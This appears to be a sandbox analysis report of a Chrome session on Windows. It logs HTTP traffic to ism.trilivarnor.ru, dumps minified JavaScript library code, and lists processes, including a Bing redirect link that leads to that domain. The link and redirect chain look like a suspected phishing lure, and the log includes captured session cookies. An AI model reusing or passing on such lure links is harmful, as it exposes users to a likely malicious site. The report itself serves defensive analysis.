                      2025-01-14 13:36:47 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                      Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                      2025-01-14 13:36:47 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                      Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                      2025-01-14 13:36:47 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                      Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                      2025-01-14 13:36:47 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                      Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.449748172.67.179.1634432696C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 13:36:47 UTC1324OUTGET /favicon.ico HTTP/1.1
                      Host: ism.trilivarnor.ru
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      sec-ch-ua-platform: "Windows"
                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                      Sec-Fetch-Site: same-origin
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: image
                      Referer: https://ism.trilivarnor.ru/NiKU3ISg/
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      Cookie: XSRF-TOKEN=eyJpdiI6Ild1dmgwKzEzNUpuaGZhMFVxNHRjVEE9PSIsInZhbHVlIjoiRHp5ejZHZVk4SldFZmR2cWJBTnVwbmcxTzU5Y1h5SHA3c3NnUVg4MTdjbklZT3BaMmdjazhXSjZtVUpOU1gzSVpTZ0xvRWRSMzhnc3M3RStiYXFqcVhrY2VZY3dUelhVTTQ3UWVLRTlLQ3JzeHBRQUVmeU5OZzRxc1pTaHJoMFQiLCJtYWMiOiI3MTRiOTU1N2Y2MWRjNjU3MjJhMDIxMWE1ZjIzYzA1NTczMjc0NDgwM2JjMmY2NTU1NDBkMjRjYTFjNzAwODllIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImllZmtsV09zS2hVYjdMZGVQWGJPT3c9PSIsInZhbHVlIjoibXY1UWpkc2xvTFhTSGFxWmRLcEZOUi9NU0lUY3FCZWdmci9LZG14OUQrVnExSFpibjBKV1RONFhkV2Z1VGgwUWpVZHQ3TzIyRzhPZHJaNDYxYzhmL3FTUkQzU3FMNEtpc1FucXlGWTJSampncGlKQmxFaHFTaXFtU25BMlN0SUoiLCJtYWMiOiJhNjVkYzA4M2ZkNzFlZjlmYzgyYzM2NjcwNzliMDYwNjAxNjZkNzc4NjQwYzg3MjVhMzkyZjgxMTBkYTZiOGFlIiwidGFnIjoiIn0%3D
                      2025-01-14 13:36:48 UTC1060INHTTP/1.1 404 Not Found
                      Date: Tue, 14 Jan 2025 13:36:48 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Cache-Control: max-age=14400
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tCgVulBHinVdFQ6opTzzTGGtC9YK9hqb%2F4TKEmP7GowSkaIOwLJ4BCgXAoAuotz6Bn4ZJi9KDCgaE%2FuLqSLuzZ7zjK5AfccFIcGUWpHHMzUx%2B%2F90YmOhcB5jm09uzw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Vary: Accept-Encoding
                      alt-svc: h3=":443"; ma=86400
                      server-timing: cfL4;desc="?proto=TCP&rtt=4345&min_rtt=4323&rtt_var=1259&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2240&delivery_rate=635572&cwnd=251&unsent_bytes=0&cid=fe8723e28cb52974&ts=304&x=0"
                      CF-Cache-Status: MISS
                      Server: cloudflare
                      CF-RAY: 901e045c2bc34338-EWR
                      server-timing: cfL4;desc="?proto=TCP&rtt=2178&min_rtt=2170&rtt_var=830&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1902&delivery_rate=1305319&cwnd=193&unsent_bytes=0&cid=97e59a0714e3aa38&ts=2491&x=0"
                      2025-01-14 13:36:48 UTC5INData Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      4192.168.2.44975135.190.80.14432696C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 13:36:49 UTC539OUTOPTIONS /report/v4?s=tCgVulBHinVdFQ6opTzzTGGtC9YK9hqb%2F4TKEmP7GowSkaIOwLJ4BCgXAoAuotz6Bn4ZJi9KDCgaE%2FuLqSLuzZ7zjK5AfccFIcGUWpHHMzUx%2B%2F90YmOhcB5jm09uzw%3D%3D HTTP/1.1
                      Host: a.nel.cloudflare.com
                      Connection: keep-alive
                      Origin: https://ism.trilivarnor.ru
                      Access-Control-Request-Method: POST
                      Access-Control-Request-Headers: content-type
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2025-01-14 13:36:49 UTC336INHTTP/1.1 200 OK
                      Content-Length: 0
                      access-control-max-age: 86400
                      access-control-allow-methods: OPTIONS, POST
                      access-control-allow-origin: *
                      access-control-allow-headers: content-type, content-length
                      date: Tue, 14 Jan 2025 13:36:48 GMT
                      Via: 1.1 google
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                      Connection: close


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      5192.168.2.44975235.190.80.14432696C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 13:36:49 UTC478OUTPOST /report/v4?s=tCgVulBHinVdFQ6opTzzTGGtC9YK9hqb%2F4TKEmP7GowSkaIOwLJ4BCgXAoAuotz6Bn4ZJi9KDCgaE%2FuLqSLuzZ7zjK5AfccFIcGUWpHHMzUx%2B%2F90YmOhcB5jm09uzw%3D%3D HTTP/1.1
                      Host: a.nel.cloudflare.com
                      Connection: keep-alive
                      Content-Length: 436
                      Content-Type: application/reports+json
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2025-01-14 13:36:49 UTC436OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 35 39 30 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 69 73 6d 2e 74 72 69 6c 69 76 61 72 6e 6f 72 2e 72 75 2f 4e 69 4b 55 33 49 53 67 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 37 39 2e 31 36 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65
                      Data Ascii: [{"age":0,"body":{"elapsed_time":590,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://ism.trilivarnor.ru/NiKU3ISg/","sampling_fraction":1.0,"server_ip":"172.67.179.163","status_code":404,"type":"http.error"},"type":"network-e
                      2025-01-14 13:36:49 UTC168INHTTP/1.1 200 OK
                      Content-Length: 0
                      date: Tue, 14 Jan 2025 13:36:49 GMT
                      Via: 1.1 google
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                      Connection: close


                      Click to jump to process

                      Click to jump to process

                      Click to jump to process

                      Target ID:0
                      Start time:08:36:32
                      Start date:14/01/2025
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                      Imagebase:0x7ff76e190000
                      File size:3'242'272 bytes
                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:false

                      Target ID:2
                      Start time:08:36:34
                      Start date:14/01/2025
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 --field-trial-handle=2248,i,737139724013332118,2253847056333091949,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Imagebase:0x7ff76e190000
                      File size:3'242'272 bytes
                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:false

                      Target ID:3
                      Start time:08:36:41
                      Start date:14/01/2025
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.bing.com/ck/a?!&&p=fd7626b0c7bb523cd38553a09da78a2ed304fe5ce8eaebb5e1b188f81ebd7fd6JmltdHM9MTczNTc3NjAwMA&ptn=3&ver=2&hsh=4&fclid=1fc1712b-f9c6-643f-1175-6443f86a65f4&u=a1aHR0cHM6Ly93YWVsZmEuY29tL3Byb2R1Y3QtY2F0ZWdvcnkvd29tZW4vZW5zZW1ibGVzLw#aHR0cHM6Ly9pc20udHJpbGl2YXJub3IucnUvTmlLVTNJU2cv"
                      Imagebase:0x7ff76e190000
                      File size:3'242'272 bytes
                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      No disassembly